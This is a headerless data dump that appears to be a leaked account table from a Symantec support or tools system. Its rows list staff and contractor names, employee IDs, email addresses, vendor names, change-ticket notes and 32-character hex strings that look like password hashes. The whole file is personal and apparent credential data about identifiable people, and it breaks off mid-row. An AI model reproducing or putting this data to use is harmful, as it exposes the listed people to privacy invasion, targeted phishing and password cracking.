de4b-4ae9-ab2c-1dffdd0637b1,04/06/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,62aedc4a5eac36b2b2ada86fe42b65ff,Manna,<blank>,105702,Rakeyesh,NULL,NU
LL,NULL
5f46-4f2d-8db8-20ba7a10688d,SRB 18.05.2010,<blank>,tools_id@symantec.suth.com,Su
therland,93745983a42c648e9104b7d8def84f00,Chinta,<blank>,089700,Sriram,NULL,NULL
,NULL
7a0e-4991-bbb2-7dd286a26e67,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,e355a71c641b3abe8de67d4c35a2dc01,Alagarswamy,<blank>,086575,Muthugopal,NU
LL,NULL,NULL
f81c-4489-a193-fcbcd852acd7,hvk2March10,EMPROV,Tools_id@symantec.suth.com,Suther
land,f73a49372afe7d49db2a38d0b58a6fb5,FBenico,<blank>,100474,Hubert,NULL,NULL,NU
LL
97d0-4844-b998-1ab1e7a5fa2a,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,9ca8029dec10e089ad3891d1974b112a,C,<blank>,074589,Dinesh Kumar,NULL,NULL,
NULL
7124-4785-a5d7-b4fc660cffda,CRQ000000434761- CLNP 02 Dec 2011,000-0000,tools_id@
symantec.suth.com,Sutherland,7b97bd33eeef9715ca753e63828360b6,Menon,<blank>,1227
22,Siraj,NULL,NULL,NULL
036a-467e-b6cf-a2e8005a5fbf,<blank>,<blank>,laetitia_jouhaud@symantec.com,Symant
ec,3aca445913c8d8a66280ff3c964f53cb,Jouhaud,<blank>,laetitia_jouhaud,Laetitia,NU
LL,NULL,NULL
62bf-4452-8fe2-5d14e1ff1696,CRQ000000434753- CLNP 02 Dec 2011,000-0000,tools_id@
symantec.suth.com,Sutherland,f64a6d7708626c583951b01be701781e,Shaikh,<blank>,122
725,Sarfaraz,NULL,NULL,NULL
ac5b-4e68-a319-a81e705fe656,<blank>,<blank>,toolsid@symantec.com,RM-feb7-2012-CR
Q000000544422,610f4db497a36e72ce6b9fa244c65e59,Rubio,<blank>,111126,Nickelson,NU
LL,NULL,NULL
bfda-489e-abc6-32a27f71f10d,CRQ000000241079,<blank>,Prajin_Vijayan@symantec.com,
ksc-04/15/2011,34edfaa488cf09f163d7279fa5c7affc,Vijayan,<blank>,114519,Prajin,NU
LL,NULL,NULL
b92e-45ea-9dc9-14050ea27a65,SRB 24.05.2010,INC178919,Tools_ID@Symantec.Suth.Com,
Sutherland,2a85bbf335c73cdcae3d1ae873fd5cb2,G,<blank>,090888,Kishore Kumar.,NULL
,NULL,NULL
6072-4da0-8a43-30b50aff86da,AP 23_12_10,<blank>,Athreya_P@symantec.com,Symantec,
ed07a326204e810c39d52ab4423a00fb,P,<blank>,111547,Athreya,NULL,NULL,NULL
f66f-443c-b0c7-074ff8dfc09c,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,b
2f678ed3df5d03a79ccb74122b47518,Tiwari,<blank>,111721,Arvind Shivshankar,NULL,NU
LL,NULL
433e-4699-9443-b6d98de432db,INC213497,nam 07/15/2010,tools_id@symantec.suth.com,
Sutherland,18fb9cd399829179e8ec6625e074525d,Gallardo,<blank>,098216,MarkManingas
,NULL,NULL,NULL
1cab-4d02-831c-ef63078c15e9,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,cb79082bd150f1de87b4b53c5bcfdb8d,Barraquias,<blank>,100142,JoreizCadal
in,NULL,NULL,NULL
56d7-4d0d-99ee-ab977a6306be,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,5a853947098c88c03757f9635fe9c8e5,Peco,<blank>,110056,Davidjohn,NULL,NULL,NU
LL
7112-4dea-8571-92c62761709c,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,5050bb780509ed5b126abd0f355c8cf8,Pepito,<blank>,110075,Regaillelainne,NULL,
NULL,NULL
73f6-4ef9-a773-b4613f652241,SRB 27.05.2010,INC182175,tools_id@symantec.suth.com,
Sutherland,ccef9ae13d03bb9d1133d7ac661b928c,Ameen,<blank>,075290,Noorul,NULL,NUL
L,NULL
168a-41d0-a2c2-2f3dc7f02a98,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,8ee9d928e305b8513cf66dbd01c4598c,Skidmore,<blank>,086864,Jason,NULL,NULL,
NULL
8634-474f-9245-2feed1f173bd,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,6de27b9403e670e6e766061681812181,Molina,<blank>,110077,Roseanne,NULL,NULL,N
ULL
4a1d-4ae0-9e94-8c6afd819adb,SRB 24.05.2010,INC179290,tools_id@symantec.suth.com,
Sutherland,8bf7ed7d04de1f76f49337dbdc3120d2,Torres,<blank>,096787,Ermelinda,NULL
,NULL,NULL
440e-4b55-ba2a-5bf3ec7519e2,CRQ000000267519--vmd--31/05/2011,<blank>,Appu_Sundar
am@symantec.com,<blank>,62320d33b102fe7cdc619f5e678b71c1,Sundaram,<blank>,115477
,Appu,NULL,NULL,NULL
67d0-4123-9477-608e5e8a38a7,04/06/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,c82bab3d46e8f0bbec262dc36cb78c20,VooriGiri,<blank>,105707,Vishal,NULL,
NULL,NULL
6cec-4b24-993b-45be30c426d4,PM - 6/2/2011 - CRQ000000269139,<blank>,n_kumar1@sym
antec.com,<blank>,99bd9eaf60d9463080592be67a72c216,Senthil Kumar,<blank>,115936,
N.,NULL,NULL,NULL
6089-4916-a7f6-2f66181184bf,<blank>,<blank>,deborah_mundorff@symantec.com,Symant
ec,272d45bc600d31f906984b1dcc6c4659,Mundorff,<blank>,deborah_mundorff,Deborah,NU
LL,NULL,NULL
836e-4822-91c9-de8a0a75c0f3,CRQ000000298996--VMD--12/07/2011,000-000,JayaAnand_J
@symantec.com,Symantec,aaacf0fe7048f5b4a7112414b72fcc40,J,<blank>,117175,Jaya An
and,NULL,NULL,NULL
6bb8-412b-82ae-7d598eb67fcc,CRQ000000236243-vmd-08/04/11,000-000,tools_id@symant
ec.suth.com,Sutherland,f9a88e74c952eded8a7401c3ceb9a494,Driz,<blank>,114787,Arne
l,NULL,NULL,NULL
1e19-4303-bd68-73316de2521e,CRQ000000321874--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,3462dd5f5c7bd5e7a0aa07a431c5c3eb,H,<blank>,119610,Kot
hadarama Prabhu,NULL,NULL,NULL
d919-4188-a4fc-bdab14a9e7c0,<blank>,INC213497,tools_id@symantec.suth.com,sms 29,
2c6b7fb7318af0366e85985c53674e80,Varghese,<blank>,089844,Aneeja,NULL,NULL,NULL
e3a1-42e8-ba68-8eed1828262e,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,dc7ca731d5caff8a2cb5b1b18e270281,P,<blank>,089799,Srishanth,NULL,NULL,NUL
L
2ac6-45e5-98f0-a9d6083c8b7a,05/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,61573411455a2fb0799a62fb2937dc81,Runja,<blank>,100911,Chandana,NULL,NU
LL,NULL
d11c-4125-aff9-2e3e428e5e28,04/06/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,e5e5ab04c17f6e7cb04a4fae89116940,Notario,<blank>,105732,Erwin,NULL,NUL
L,NULL
a019-4cfa-be7a-d1cc9bbbc8ac,bpr-04-03-10,emprov,tools_id@symantec.suth.com,suthe
rland,dd2904cf93f00f4a7f8558b030283b4b,RajanMallan,<blank>,100576,Roopesh,NULL,N
ULL,NULL
09e8-4874-8a43-b0907c89105f,SRB 12.08.2010,INC000000241142,Tools_Id@Symantec.Sut
h.Com,Sutherland,5924c936ccc97901471a942432d76dc4,Vadamodulu,<blank>,100651,Saty
aGanesh,NULL,NULL,NULL
9cb9-4755-951f-f88b8cd91887,sms 12.11.10,CRQ000000111057,tools_id@symantec.suth.
com,Sutherland,5a7319051d6614082624480d4d75fa5e,Anand,<blank>,108192,Balaji,NULL
,NULL,NULL
eceb-4f09-b2dc-0a342ae4f96d,CRQ000000321885--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,4eaa422663033046b2a443e5731370ce,K,<blank>,119612,Ani
ta,NULL,NULL,NULL
c5e2-4838-a581-293b36319734,05/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.com,S
utherland,3adbff8a38a0c169b72bcebb67a754e5,RendonLuiz,<blank>,104907,Sarah,NULL,
NULL,NULL
5837-46bf-87d9-2c4f82bd5f3c,WS 12-08-2010,INC000000241149,Tools_Id@Symantec.Suth
.Com,Sutherland,5aa65541d6c5c983d117ad44c192efc6,Chilukamarri,<blank>,100444,Sur
ya,NULL,NULL,NULL
cd4c-48ec-82a9-0c9c3e8709fd,CRQ000000321918--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,7559353ba41ee863bc36a753a960f57c,Asrani,<blank>,11962
2,Girish Kamal,NULL,NULL,NULL
0107-4820-9a21-0c1728e0ddd5,sms 12.11.10,CRQ000000111062,tools_id@symantec.suth.
com,Sutherland,519d43978307fd1843fc71dd86d31ce4,Sudhakaran,<blank>,108193,Ramkum
ar,NULL,NULL,NULL
acda-4cdd-a173-0fad8b576f57,WS 12-08-2010,INC000000241149,Tools_Id@Symantec.Suth
.Com,Sutherland,2e38261c0710643f14f8a9443b70d8ee,Hanmanthu,<blank>,100920,Santho
sh,NULL,NULL,NULL
c797-4015-97bd-2e9c215c26da,smsm 12.11.10,CRQ000000111072,tools_id@symantec.suth
.com,Sutherland,885d1f6a816646c333bf5ba53d404618,Bakthavachalam,<blank>,108194,R
evathy,NULL,NULL,NULL
9d05-436b-8bee-25d692522cee,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,4
ced0cf179b74e285f1d668e0ca465f6,Subramaniam,<blank>,108869,ReeganPrabhu,NULL,NUL
L,NULL
899d-4102-a347-69d251ce9836,AP-27/12/10,<blank>,Bharath_Kumar_K@symantec.com,<bl
ank>,4323ff9020e7e381b3a8fe69059cac6d,Kumar,<blank>,111548,Bharath,NULL,NULL,NUL
L
f7fa-453d-b65e-3f138504bc52,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,1aff27299a427aaa277b599f229530a8,Nair,<blank>,100574,Shreeraj,NULL,NUL
L,NULL
cc2e-45da-a0bd-cce097e84a0e,bpr-18-05-10,INC175643,tools_id@symantec.suth.com,su
therland,d99250d0e573bafb1fb7b1be88ed5d7e,Padua Salva,<blank>,097834,Cheeno Runk
in,NULL,NULL,NULL
4a36-475a-b0b5-be1952cd0765,04/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,353fe1a5918ac201fa4b5371d60850cb,AureEngcoy,<blank>,100688,Diane,NULL,
NULL,NULL
65b9-40cd-8c60-d34ad801dde5,bpr-18-05-10,INC175643,tools_id@symantec.suth.com,su
therland,53365efb7968d68c34c40e6ad10aaa06,Tinay Dalisay,<blank>,097837,Roxanne G
race,NULL,NULL,NULL
7f4b-4837-93c9-3427125ebffa,SRB 12.08.2010,INC000000241142,Tools_Id@Symantec.Sut
h.Com,Sutherland,9768556b2a571a01a5f895a073efdf0f,Singh,<blank>,100907,Amit,NULL
,NULL,NULL
802e-43b0-b8de-c3e3cb4be8a3,05/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,62434da51af0f0488f41f17790328c72,Lakhinana,<blank>,100927,Sureshkumar,
NULL,NULL,NULL
9a7e-45bb-8a6b-c63556caab6e,05/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,e550ca36bd206d353a69f7e7c8f02056,Botta,<blank>,100928,Venkatesh,NULL,N
ULL,NULL
b1e6-4600-8ad0-50841ee79337,05/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,5297fcdcb2154a3610a79a6f40a8a308,Merugumalla,<blank>,100825,VinayPrasa
d,NULL,NULL,NULL
3439-4291-b573-7ab7f5499496,VB=31/12/2010,<blank>,Myre_Canoy@Symantec.com,<blank
>,889365478c724bb6846f5c920cb092a4,Canoy,<blank>,111735,Myra Lou,NULL,NULL,NULL
fdfa-44c9-9b35-5196834d1492,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,2
333d59b22172cd46046f87404e0f31e,Ahamed,<blank>,110803,Ijaz,NULL,NULL,NULL
9e97-4f5f-86ee-7835f85c65b5,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,6
36d5c41b6766ffb89ee2f158b1781c0,Ahmed,<blank>,111897,Shafeeque,NULL,NULL,NULL
c823-4111-a9fa-68c51bafc45a,sp-10/1/2011,<blank>,tools_id@symantec.sut,<blank>,0
0e478d641c8211173d116ec3a5e1767,Singh,<blank>,111944,Rajkamal,NULL,NULL,NULL
cee6-4041-a1f6-664b8e159079,05/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,4f198adf5f18b4e7ca6aa18b5f4f4eae,Kottala,<blank>,100923,SreenivasPasup
athi,NULL,NULL,NULL
322b-4758-bc8a-13887506b2c8,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464914,aa4c21d038841aa03d5da45436a2fa27,Mercado,<blank>,123256,Van
essa Galpao,NULL,NULL,NULL
7f93-4941-8c37-ec826c513a42,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464929,ae48fed957cd1e2d78bb81adb4bf35a0,Casue,<blank>,123261,Karre
n Marie Rodil,NULL,NULL,NULL
f2ef-4c68-b4d4-db87ccc34d16,CRQ000000467035 SP 22 Dec 2011,000-0000,Kim.Zwaagman
@teleperformance.nl,Teleperformance,2e67d6de00669df90b3978f029d5e01a,Zwaagman,<b
lank>,069805,Kim,NULL,NULL,NULL
697c-40a0-ada5-0d58ebd880a7,CRQ000000486385 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,1137da743d1a38587e932aeee5017bb7,Puerto,<blank>,1236
46,KayeSheena,NULL,NULL,NULL
c590-4854-a62c-89e25ec1ec5c,CRQ000000486389 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,71e2b41e825279977a609310ae5587e2,Paciencia,<blank>,1
23647,MariaPinne,NULL,NULL,NULL
6c5c-4b4f-a593-7500a1a99a66,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496534,74b5481a428f2312e45a52f5810a1c77,Cagantas,<blank>,12
3857,Melvin,NULL,NULL,NULL
16d8-4938-a660-d394b01687d7,<blank>,<blank>,tools_id@symantec.suth.com,RM-Feb 3-
2012-CRQ000000539192,2a6b788e92e4874130ca933881eb8f14,Alcazar,<blank>,124536,Jem
madel,NULL,NULL,NULL
7003-472a-9c94-2576a507f7c2,SRB 24.08.2010,INC000000249136,Tools_Id@Symantec.Sut
h.Com,Sutherland,27782e9130a23445daf8dceeafcec250,Sunchu,<blank>,100926,RamNares
h,NULL,NULL,NULL
b64c-44fc-a788-3d9e2d11849b,bpr-19-05-10,INC175643,tools_id@symantec.suth.com,su
therland,4f5da1d603ce52d79d36f6638a31c4ff,Milvar,<blank>,097842,Richard Albaran,
NULL,NULL,NULL
f229-4e42-814b-743d97d1cbd0,SRB 24.08.2010,INC000000249136,Tools_Id@Symantec.Sut
h.Com,Sutherland,cde33cb8bd29aab141375b46d7e1dff0,Veligarapu,<blank>,101122,Nave
enKumar,NULL,NULL,NULL
3305-4859-af6d-4a46f4cd89d3,08/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,da575a1b35c8e4cb5a141502309efb3b,Jyoti,<blank>,101041,Nirmala,NULL,NUL
L,NULL
4c18-49c3-9507-59b6845eafc4,<blank>,<blank>,ggenc@symantec.teleperformance.gr,CT
- 12/09/2012 - CRQ000000800590,fa9d17c780b2c9b16cae33e5f5f52708,Genc,<blank>,22
9966,Gokhan,NULL,NULL,NULL
19bb-46ee-98c1-eda9198efcc2,<blank>,<blank>,kkarapanos@symantec.teleperformance.
gr,CT - 12/09/2012 - CRQ000000801161,eb56a5c61708f4c8624601342bf11cf9,Karapanos,
<blank>,229983,Konstantinos,NULL,NULL,NULL
b7ca-460e-9c09-702c60716a61,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,944870c1dd80481a2cd128abbc60b653,Vaidyanathan,<blank>,089090,Karthik,NULL
,NULL,NULL
89f0-4bc7-a008-4a106c189076,WS 27-08-2010,INC000000251655,tools_id@symantec.suth
.com,<blank>,e00562e8ace6bcd630bf46ee7738f421,B,<blank>,092116,PradeepKumar,NULL
,NULL,NULL
63d0-4edc-b415-f2f41c3f3bad,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,5032ee03eb280261dbadaaeb6747a1f0,V,<blank>,088990,Chiranjeevi,NULL,NULL,N
ULL
b269-415b-bc9b-76b4d460740e,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,3c0f66d88e12586339a57540da4b34a2,K,<blank>,075915,Mithun,NULL,NULL,NULL
26e3-4d66-a560-c5053227d96b,RM-24-08-2011-CRQ000000326208,<blank>,tools_id@syman
tec.suth.com,com,4ac422ce72f80025b38a5229387697c8,Rangan,<blank>,119870,Ranjit,N
ULL,NULL,NULL
08b3-4c90-889a-cd8ac1626378,NA Oct 19 2010,INC291950,Wasim_Mulla1@symantec.com,<
blank>,516c63d3f89718bc275041544e3d2a7f,A Mulla,<blank>,109667,Wasim,NULL,NULL,N
ULL
8839-40af-8326-82f424e1a7e3,08/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,d0e78a657f767d9379c80ea3318a680b,Kasimuthu,<blank>,101033,Bhaskaran,NU
LL,NULL,NULL
d630-41f9-952a-644aab1cb82d,<blank>,SH 22/10/2010,tools_id@symantec.suth.com,<bl
ank>,73fc50ae8d2457a310c4d983fe2f13c6,Dedios,<blank>,110063,Jayson,NULL,NULL,NUL
L
3470-4392-9505-87614e379352,SRB 29.04.10,INC163045,Tools_Id@Symantec.Suth.Com,Su
therland,1834ba2cfb74574e427b6c6b9cebafde,Raghavan,<blank>,101065,RajLakshmi,NUL
L,NULL,NULL
5be8-4dcf-8424-78cee6983eee,CRQ000000346817 SP 28 Sep 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,d941cc0f0fa1156ef5e5dcd9018fe2a5,Kumar B,<blank>,12092
4,Praveen,NULL,NULL,NULL
a4ff-4ad7-af25-6eda775e2766,<blank>,<blank>,symantec_2nd_maa@tp-tec.nl,Teleperfo
rmance,9488c9a200428ba88f9b998b1ee1241d,Bollen,<blank>,110302,Ilse,NULL,NULL,NUL
L
0d5c-4724-bafd-15e00a37a3e9,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,dea65a0636dfbf267923e785640ed6d4,Kumar,<blank>,088756,AnthonyRajesh,NULL,
NULL,NULL
3a09-4ccb-b361-85b04a9bb698,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,0cfb4ca61b3a83529a8be4153cd52fb7,K S,<blank>,117055,Savith
,NULL,NULL,NULL
3683-47f8-a1b3-e56f61e02edf,CRQ000000107687,hvk 15 Aug2010,subrahmanya_hegde@sym
antec.com,Symantec,ef773e21cc9315db20c292e423bf2ffe,Hegde,<blank>,107037,Subrahm
anya,NULL,NULL,NULL
a870-4d0c-aa69-0576c51a5845,CRQ000000349498-CLNP-04/10/2011,00-0000,tools_id@sym
antec.suth.com,Sutherland,09b781dd216f3b12c60dc36e4df3a17e,M,<blank>,074038,Mani
balan,NULL,NULL,NULL
6437-4c21-b260-ba368c097de7,10/03/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.Com,S
utherland,197a51519ce299383ace8e21b7f771ff,Aditya,<blank>,101215,Nitesh,NULL,NUL
L,NULL
2327-4b98-9d54-d62a35264268,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,2
829a062debe5dbc2a1b02dfbbb9f623,Oliquino Maquidato,<blank>,111119,Carlo,NULL,NUL
L,NULL
9c80-4582-9714-abcbab56a034,<blank>,<blank>,tools_id@symantec.suth.com,<blank>,a
ad89ff1bf153c705853daa2b13e1da0,Mendiola Du,<blank>,111121,Godofredo,NULL,NULL,N
ULL
f8f8-46f9-9650-d0ba46ffbeb1,<blank>,<blank>,nicholas_williams@symantec.com,Syman
tec,37d8dd0d28ec08c35f9a8af14e4e966b,Williams,<blank>,nicholas_williams,Nicholas
,NULL,NULL,NULL
d497-40cf-a702-88e78cdea9ab,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,1afa641c842cfd96621ab874f2661bb1,Skumar,<blank>,089042,Anoop,NULL,NULL,NU
LL
eec8-41b3-9bd5-16fcc7a8932e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,08fdbdd8dea055d9e6da0298889b552f,Ramakrishnan,<blank>,11
2782,ArunKumar,NULL,NULL,NULL
529b-433f-9d44-9441ad2d0ac9,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,e541df1065caa87c4e14e8dec78d0a3c,Kakati,<blank>,111355,L
oni,NULL,NULL,NULL
6d70-4a65-a361-c4f96cfbfaae,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267270 - PR - 5/30/2011,3602b27f82ddd82f1f2d148469e15e75,Rajabandi,<blank>,08926
9,Sridar,NULL,NULL,NULL
74c0-4e2b-84be-80d7f8ff27e6,SRB 24.05.2010,INC179290,tools_id@symantec.suth.com,
Sutherland,3de48c38fa1e9c335462646d7b7ec2d9,Chavez,<blank>,098303,Devie,NULL,NUL
L,NULL
e420-4698-8b25-caac5f4f021c,<blank>,<blank>,clinton_gower@symantec.com,Symantec,
06d42399201c90885e5a4473df98794a,Gower,<blank>,clinton_gower,Clinton,NULL,NULL,N
ULL
48a8-4907-9a8d-f666206ab916,<blank>,<blank>,glenn_pannier@symantec.com,Symantec,
950d5c6474016d957edc772d7544fd75,Pannier,<blank>,glenn_pannier,Glenn,NULL,NULL,N
ULL
ecc6-4c4c-8d8b-917c7bb7c22e,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267722 - PR - 5/31/2011,1d4b714befa06f12277e2245947a4355,Cabaccang,<blank>,11667
8,Edwin Cabansag,NULL,NULL,NULL
c2d0-4eca-bbfc-69904d8ef102,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
267731 - PR - 5/31/2011,aa49124d195a1e349fe7d2e602d9ba47,Chavez,<blank>,116679,R
odelPaolo Ventura,NULL,NULL,NULL
e197-4e92-93c9-0662fd039fcc,CRQ000000200411 -KD-11-2-2011,<blank>,VinodhRaj_D_P@
symantec.com,Symantec,d5ca430808590031fc8feaf8435486af,Raj,<blank>,112071,Vinodh
,NULL,NULL,NULL
ce93-4c25-9b64-7cd0b3bc9a46,SRB 24.05.2010,INC179290,tools_id@symantec.suth.com,
Sutherland,6d2e8e87ff0d1d764b58505d5cf0802d,Plaza B,<blank>,100162,Katrina Angel
ica,NULL,NULL,NULL
ab12-4e00-ba2a-36a522795395,bpr-10-03-10,INC121852,dirk_bremen@symantec.com,syma
ntec,7bf8bdde5a6298a8fdcd80c2013e7f39,Bremen,<blank>,051056,Dirk,NULL,NULL,NULL
e867-4190-86d4-14fa3a254797,sms 06.10.2010,<blank>,tools_id@symantec.suth.com,su
therland,d908aef5929fdd5b02b916a17dba1b60,A Meshram,<blank>,109190,Mayuri,NULL,N
ULL,NULL
e107-458b-bf70-5d11de2833d3,<blank>,<blank>,symantec_2nd_maa@tp-tec.nl,<blank>,8
2d2f36f9832a6c5e96bb06181dbb279,Bougie,<blank>,109421,Tim,NULL,NULL,NULL
0f20-4221-8ab1-3a97d547a4ce,CRQ000000200105,<blank>,tools_id@symantec.suth.com,A
DR-11/2/2011,4980cf5787a8715e3a677d670cec147b,Thomas,<blank>,112951,Renjith,NULL
,NULL,NULL
2a34-45fe-bf1d-f9656158aaf7,AP-17-2-2011,<blank>,tools_id@symantec.suth.com,<bla
nk>,8728971f840cf037a6c64152d0bf17e0,Basheer,<blank>,089997,Ramiz,NULL,NULL,NULL
2f61-474f-b0ef-1580c179b634,08/03/2010 - SPJ,EMPROV,Tools_Id@Symantec.Suth.Com,S
utherland,0261fd7b2299b0dd02e47b9266d2848b,Balasubramanian,<blank>,101053,Sethup
athy,NULL,NULL,NULL
6f87-40ce-8a8c-d188d94b9b08,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,957e10ab3cf807111037ecf5b50eee88,Ayoob,<blank>,086770,Anjam,NULL,NULL,NUL
L
9ff4-4a83-89b5-0ed325497555,SRB 28.06.2010,INC000000203799,symantec_2nd_maa@tp-t
ec.nl,TPH,e1fe694951afa8097a0203d329ec744e,Schurgers,<blank>,089949,Gaby,NULL,NU
LL,NULL
e6f2-4c6a-ac40-2f40cfe15af2,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,c412a21028a9b9c4d3af4dd3853f1ae4,Depalco,<blank>,076058,Elaine,NULL,NULL,
NULL
7e2b-42a4-bc67-62854a3bafa4,WS 22-07-2010,INC000000223553,tools_id@symantec.suth
.com,<blank>,1a426f43ea833dded9174a0b8f7d45f7,Anne,<blank>,091737,Satish,NULL,NU
LL,NULL
1f80-427b-b61a-015fddc2ade7,WS 22-07-2010,INC000000223553,tools_id@symantec.suth
.com,<blank>,927976338a7aa1f359c9f219a58e6f81,Kumar P,<blank>,089757,Pradeep,NUL
L,NULL,NULL
76d4-4956-b392-c73ba494b15f,sms 27.09.2010,<blank>,Anthony_Moore@symantec.com,Sy
mantec,d2d2c49030b93563126627e008b0def9,Moore,<blank>,069963,Anthony,NULL,NULL,N
ULL
53b3-4dcb-82d0-5eba6f9ba5fd,<blank>,<blank>,kevin_kennedy@symantec.com,Symantec,
2f689db08c372db873af34973a064a3a,Kennedy,<blank>,kevin_kennedy,Kevin,NULL,NULL,N
ULL
7392-4c97-bdde-3234dc586959,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,db6638252a53c7fafe68dad61aaef039,Dutta,<blank>,092500,Arpan,NULL,NULL,NULL
4829-4ef8-9330-9da2edc2e224,<blank>,<blank>,kevin_gowen@symantec.com,Symantec,cc
96255f8ba31f0a8c804f7b81acbdc2,Gowen,<blank>,kevin_gowen,Kevin,NULL,NULL,NULL
763e-4711-8567-d8fb011e65e1,WS 15-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,08a7b65ea442879b31d05555dd432888,Vamadevan,<blank>,089039,Varun,NULL,NULL
,NULL
1814-4442-9278-cb8ea53eee6d,AY 22.07.10,INC000000223412,tools_id@symantec.suth.c
om,<blank>,e2d775fb6f75cd75044a02f84b3ddcb1,Khaleefathullah,<blank>,089345,Syed,
NULL,NULL,NULL
d26d-415c-baf9-ca374c8da18b,CRQ000000218916 - PM - 15/3/2011,<blank>,tools_id@s
ymantec.suth.com,<blank>,c0d952730a7acc9112c9ea7413086e8d,Peter,<blank>,113931,R
amirez,NULL,NULL,NULL
655e-44e4-be8c-7e11d8dcfdec,<blank>,EMPROV,Symantec_2nd_maa@tp-tec.nl,Teleperfor
mance,730785c014e5e6f327cf65dfdd4e5233,Mullen,<blank>,101160,Edwin,NULL,NULL,NUL
L
ac1f-4902-91fb-7c77d1b99ef3,CRQ000000346814 SP 28 Sep 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,11b38b0cf386d413a7ae366292fb9f6e,Anand,<blank>,120923,
Shankar,NULL,NULL,NULL
a979-46b8-8c1a-d73af1b8962a,SKK - 28/1/2011 - CRQ000000192790,<blank>,tools_id@s
ymantec.suth.com,<blank>,6dee12b882826851c184e77454e6e079,Kumar,<blank>,112649,K
iran,NULL,NULL,NULL
c0c4-4fe4-a0b2-fb4d913b335e,CRQ000000221813 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,15d5e79ab1581e20463bb946f87d4560,Roy,<blank>,114011,Den
in,NULL,NULL,NULL
41b6-4baf-a123-ede3be337ade,CRQ000000221308 PBP 17/03/2011,<blank>,tools_id@syma
ntec.suth.com,Sutherland,f9c7540ed3a7b0e52cc16b8d85ab1de1,Kundu,<blank>,113884,A
nindya,NULL,NULL,NULL
165c-4257-9ded-e650ccf9fc27,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,7dca22d469d7263367ff750656fc9611,R,<blank>,117069,Harikris
hnan,NULL,NULL,NULL
48ad-4fcb-b06d-539468005052,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,b03c56f6b24e9eac7d2da6bf1d4cf753,Bora,<blank>,086274,Umamaheshwarreddy,NU
LL,NULL,NULL
3680-4ff5-9971-5ad606227a3d,RM-29th Sept - CRQ000000346914,<blank>,tools_id@syma
ntec.suth.com,<blank>,fc7ec6f43580321e522da8bb3e9b8888,Rasheed,<blank>,117073,Sh
ibu Abdul,NULL,NULL,NULL
2337-4640-9e99-f91fb9b8d9fe,CRQ000000349498-CLNP-04/10/2011,000-0000,tools_id@sy
mantec.suth.com,Sutherland,e268159a2ec9ff76456791671e6231d0,Francis,<blank>,0738
81,Savio,NULL,NULL,NULL
a3a1-41f3-8dfd-e1608417acc8,07/06/2010 - SPJ,EMPROV,symaccount@neusoft.com,Neuso
ft,ef1dd54f2ab7f44b3ca95dab06a04998,Ren,<blank>,105855,Yuwei,NULL,NULL,NULL
9a8b-40c2-83bb-0939c5e984c2,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
